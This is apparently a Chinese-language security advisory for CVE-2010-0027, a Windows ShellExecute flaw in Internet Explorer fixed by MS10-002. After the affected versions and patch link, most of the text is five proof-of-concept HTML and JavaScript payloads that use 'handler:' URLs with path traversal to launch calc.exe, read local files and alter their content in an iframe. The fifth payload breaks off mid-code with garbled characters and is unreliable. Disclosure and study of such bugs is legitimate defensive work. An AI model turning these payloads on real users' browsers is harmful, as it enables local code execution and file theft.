BUGTRAQ ID: 37884
CVE ID: CVE-2010-0027
Microsoft Windows是微软发布的非常流行的操作系统。
IE浏览器等应用使用ShellExecute API函数处理文件。由于没有正确的对数据流执行验证,用户受骗跟随了恶意URL就可能导致绕过安全过滤执行本地系统上的二进制程序。
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 2000SP4
厂商补丁:
Microsoft已经为此发布了一个安全公告(MS10-002)以及相应补丁:
MS10-002:Cumulative Security Update for Internet Explorer (978207)
链接:http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################
############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>
############# EOF #################
############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>
############### EOF ###########
############# PoC four ##############
<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert('content: ' + content);
content = 'change iframe content';
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>
</body>
</html>
##################### EOF #############################
########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(??GET??,
??handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms??,
true);
req.send(?